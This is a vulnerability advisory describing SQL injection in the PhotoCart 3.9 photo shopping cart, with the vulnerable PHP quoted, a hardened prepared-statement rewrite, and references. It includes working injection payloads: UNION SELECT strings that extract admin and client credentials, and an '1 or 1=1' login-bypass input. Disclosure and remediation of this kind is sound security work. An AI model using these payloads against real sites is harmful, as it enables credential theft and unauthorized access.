PhotoCart <= 3.9 Multiple Remote SQL Injection Vulnerabilities

2008.08.27
Credit: Dok_tOR
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Author: ~!Dok_tOR!~
Date found: 18.08.08
Product: PhotoCart
Version: 3.9 (possibly earlier versions too)
Type: Photography Shopping Cart
URL: www.picturespro.com
Vulnerability Class: SQL Injection

/[installdir]/search.php

Vuln code (PHP):

    if($_REQUEST['searchby'] == "qtitle") {
        $gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_title LIKE '%".$_REQUEST['qtitle']."%' ";
        print "Results for Gallery or event name: ".$_REQUEST['qtitle']." ";
    }
    if($_REQUEST['searchby'] == "qid") {
        $gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_id='".$_REQUEST['qid']."' ";
        print "Results for Gallery or event ID: ".$_REQUEST['qid']." ";
    }
    if($_REQUEST['searchby'] == "qdate") {
        $gdate = "".$_REQUEST['qyear']."-".$_REQUEST['qmonth']."-".$_REQUEST['qday']."";
        $gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_date='$gdate' ";
        print "Results for Gallery or event date: ".$_REQUEST['qmonth']."-".$_REQUEST['qday']."-".$_REQUEST['qyear']." ";
    }

The values of searchby, qtitle, qid, qyear, qmonth and qday are taken straight from $_REQUEST and concatenated into the WHERE clause without escaping or binding.

Condition: magic_quotes_gpc = Off

Example: http://[server]/[installdir]/search.php
Enter in the "Gallery or event name" field:

Exploit 1:
' union select 1,2,3,4,5,concat_ws(0x3a,admin_user,admin_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin/*

Exploit 2:
' union select 1,2,3,4,5,concat_ws(0x3a,client_name,client_pass,client_email),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from pc_clients/*

Authentication Bypass SQL Injection

/[installdir]/_login.php

Vuln code (PHP):

    $result = @mysql_query("SELECT * FROM pc_clients WHERE client_email='".$_REQUEST['email']."' AND client_pass='".$_REQUEST['password']."'");

Both the e-mail and the password are concatenated unescaped into the query, so the quoted comparison can be closed and the rest of the condition commented out.

Email Address: 1' or 1=1/*
Password: 1' or 1=1/*
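A hardened rewrite of the two queries above, using mysqli prepared statements so the request values travel as bound parameters instead of being spliced into the SQL string. This is an added example, not PhotoCart's or the advisory author's code; it assumes $and_expire is a fixed fragment written by the developer, uses GALLERY_TABLE as a placeholder for the galleries table the advisory does not name, and assumes client_pass holds a password_hash() value so the password can be checked with password_verify() rather than inside the query.

```php
<?php
// Added example, not PhotoCart's own code: the search.php branches and the _login.php
// query from the advisory rewritten with mysqli prepared statements, so request values
// are bound as data and a quote can no longer close the SQL literal. Assumptions:
// $and_expire is a fixed developer-written fragment, GALLERY_TABLE stands in for the
// galleries table the advisory does not name, and client_pass holds a password_hash() value.
function gallery_where(array $req, string $and_expire): array
{
    $where  = "WHERE gal_status='1' AND gal_client!='1' $and_expire";
    $params = [];   // values for the '?' placeholders, in order
    switch ($req['searchby'] ?? '') {
        case 'qtitle':
            $where   .= " AND gal_title LIKE ?";
            $params[] = '%' . ($req['qtitle'] ?? '') . '%'; // wildcards go in the value
            break;
        case 'qid':
            $where   .= " AND gal_id = ?";
            $params[] = $req['qid'] ?? '';
            break;
        case 'qdate':
            $parts = [$req['qyear'] ?? '', $req['qmonth'] ?? '', $req['qday'] ?? ''];
            if (count(array_filter($parts, 'ctype_digit')) !== 3) {
                throw new InvalidArgumentException('date parts must be digits');
            }
            $where   .= " AND gal_date = ?";
            $params[] = vsprintf('%04d-%02d-%02d', array_map('intval', $parts));
            break;
        default:
            throw new InvalidArgumentException('unknown searchby value');
    }
    return ['where' => $where, 'params' => $params];
}
function run_gallery_search(mysqli $db, array $req, string $and_expire): mysqli_result
{
    $q    = gallery_where($req, $and_expire);
    $stmt = $db->prepare("SELECT * FROM GALLERY_TABLE " . $q['where']);
    $stmt->bind_param(str_repeat('s', count($q['params'])), ...$q['params']);
    $stmt->execute();
    return $stmt->get_result();
}
// _login.php: only the e-mail reaches SQL; the password is checked in PHP.
function login_client(mysqli $db, string $email, string $password): ?array
{
    $stmt = $db->prepare("SELECT * FROM pc_clients WHERE client_email = ?");
    $stmt->bind_param('s', $email);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    return ($row && password_verify($password, $row['client_pass'])) ? $row : null;
}
```

With the values bound, the quote-and-comment inputs shown in the advisory are compared literally against gal_title, gal_id or client_email and simply return no rows.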

References:

http://xforce.iss.net/xforce/xfdb/44607
http://www.securityfocus.com/bid/30786
http://www.milw0rm.com/exploits/6285
http://packetstormsecurity.org/0808-exploits/photocart-sql.txt


Copyright 2022, cxsecurity.com
